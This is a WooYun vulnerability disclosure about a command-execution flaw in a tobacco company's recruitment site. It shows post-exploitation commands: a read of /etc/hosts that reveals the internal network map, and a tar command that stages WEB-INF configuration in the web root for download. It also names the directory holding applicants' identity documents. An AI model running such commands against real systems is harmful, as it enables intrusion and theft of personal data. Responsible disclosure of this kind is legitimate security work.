当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208801

漏洞标题:红塔烟草某系统存在命令执行漏洞(大量应聘人员身份证件/简历/可威胁内网)

相关厂商:红塔烟草(集团)有限责任公司

漏洞作者: 路人甲

提交时间:2016-05-15 10:26

修复时间:2016-07-04 08:20

公开时间:2016-07-04 08:20

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-15: 细节已通知厂商并且等待厂商处理中
2016-05-20: 厂商已经确认,细节仅向厂商公开
2016-05-30: 细节向核心白帽子及相关领域专家公开
2016-06-09: 细节向普通白帽子公开
2016-06-19: 细节向实习白帽子公开
2016-07-04: 细节向公众公开

简要描述:

命令执行

详细说明:

红塔招聘

QQ截图20160514220652.png


http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices


QQ截图20160514220306.png


QQ截图20160514220255.png

漏洞证明:

★K8cmd-> cat /etc/hosts
====================================================================================================================================
127.0.0.1 localhost loopback
::1 localhost loopback
10.96.66.138 c1ep2vm138.hongta.com c1ep2vm138
10.96.66.13 c1ep1vm13.hongta.com
10.96.66.22 c1ep1vm22.hongta.com
10.96.66.194 c1ep3vm194.hongta.com c1ep3vm194
fd8c:215d:178e:1419:6bcd:13ff:fe60:d84d c1ep2vm138-6.hongta.com c1ep2vm138-6
fd8c:215d:178e:1419:290:fa71:fa37:f562 ntp28216.hongta.com ntp28216
fd8c:215d:178e:1419:290:fa72:fa37:f562 IBMWorkloadDeployer
#bpm db server
10.96.66.11 c1ep1vm11.hongta.com
10.96.66.12 c1ep1vm12.hongta.com
10.96.66.13 c1ep1vm13.hongta.com
10.96.66.22 c1ep1vm22.hongta.com
#bpm http server
10.96.66.9 c1ep1vm9.hongta.com
10.96.66.25 c1ep1vm25.hongta.com
#bpm was
10.96.66.26 c1ep1vm26.hongta.com
10.96.66.27 c1ep1vm27.hongta.com
10.96.66.31 c1ep1vm31.hongta.com
#bpm was console
10.96.66.24 c1ep1vm24.hongta.com
#ep was
10.96.66.32 c1ep1vm32.hongta.com
10.96.66.33 c1ep1vm33.hongta.com
10.96.66.34 c1ep1vm34.hongta.com
10.96.66.35 c1ep1vm35.hongta.com
#ep http server
10.96.66.36 c1ep1vm36.hongta.com
10.96.66.37 c1ep1vm37.hongta.com
#ep was console
10.96.66.38 c1ep1vm38.hongta.com
#tam tim server
10.96.66.30 c1ep1vm30.hongta.com
10.96.66.40 c1ep1vm40.hongta.com
#ldap
10.96.66.29 c1ep1vm29.hongta.com
10.96.66.46 c1ep1vm46.hongta.com
10.96.66.47 c1ep1vm47.hongta.com
#org server
10.96.66.53 c1ep1vm53.hongta.com
#issue server
10.96.66.48 c1ep1vm48.hongta.com
#hr zp ihs
10.96.66.19 c1ep1vm19.hongta.com
#hr zp was
10.96.66.138 c1ep1vm138.hongta.com
10.96.66.195 c1ep1vm195.hongta.com
10.96.66.194 c1ep1vm194.hongta.com
#mobile was
10.96.66.130 c1ep1vm130.hongta.com
10.96.66.132 c1ep1vm132.hongta.com
10.96.66.133 c1ep1vm133.hongta.com
#mobile ihs
10.96.66.137 c1ep1vm137.hongta.com


QQ截图20160514231710.png


服务器内含大量应聘者证件信息

QQ截图20160514233044.png


QQ截图20160514233211.png


QQ截图20160514233355.png


QQ截图20160514233537.png


QQ截图20160514233658.png


QQ截图20160514233750.png


QQ截图20160514233829.png


QQ截图20160514233915.png


资源全都在这个目录

/opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/upload/


QQ截图20160514234048.png


QQ截图20160514234302.png


打个包,文件就全下来了
比如我想看看配置

tar -cvf /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/wpp.tar.gz /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/WEB-INF/


访问http://zp.hongta.com/HRWEB/wpp.tar.gz
就把配置什么down下来了,证件那些更是小意思

修复方案:

补丁,关闭debug模式

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-05-20 08:19

厂商回复:

已对该漏洞进行修复

最新状态:

暂无